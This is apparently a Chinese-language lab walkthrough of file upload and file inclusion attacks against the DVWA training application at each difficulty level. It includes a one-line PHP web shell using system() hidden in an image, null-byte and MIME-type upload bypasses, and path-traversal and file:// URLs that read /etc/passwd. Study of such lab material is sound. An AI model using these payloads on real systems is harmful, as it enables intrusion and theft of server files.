Web渗透测试 之 文件上传、文件包含

文件上传漏洞修复

1. 文件mime 类型过滤

2. 文件大小过滤

3. 文件类型过滤

4. 获取图像信息检测

 

使用dvwa 测试

 

1. low级别 没有做过滤可以直接上传php文件。

 

 

 

 

 

2. 在medium 级别对上传文件的mine 类型进行了白名单过滤，我们可以通过brupsuite 改包实现上传

修改数据包Content-Type: application/x-php 为 Content-Type: image/jpeg

 

 

 

 

3. 在 high 级别中 增加了，类型检测，getimagesize获取图像信息检测

php5.4 以下 可以使用文件名 1.php%00.jpg 进行绕过

php5.4 以上 需要配置文件包含漏洞进行渗透

 

 方法一：

绕过方式，在图片文件后面 追加 恶意代码

由于无法使用菜刀等，一般该级别可以使用php的 system 函数

<?php @system($_POST[caibao])?> # 该命令需要使用post 提交数据

上传之后需要找到文件保存的绝对路径，以及存在的 文件包含漏洞

 

方法二：

使用GIF98A 放在文件首行，声明该文件是图片格式

 

 

 

 

 

 

 

 

文件包含漏洞

文件包含漏洞是由于php调用本地文件产生的

 

low 级别 未设置过滤，可使用file 查看系统任意文件

使用 相对路径获取数据

http://192.168.140.131/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd

 

使用绝对路径获取数据

http://192.168.140.131/dvwa/vulnerabilities/fi/?page=file:///etc/passwd

 

 

 

 

 

medium 级别对url 已经 相对路径做了过滤，可以使用file 协议进行绕过（与low 绝对路径方法相同）

 

 

 

 

high级别 使用白名单过滤只可以访问include.php 以及file 开头的文件，而file协议刚好也是file开头 即可正常绕过

 

 

 

impossible 级别设置了更严谨的白名单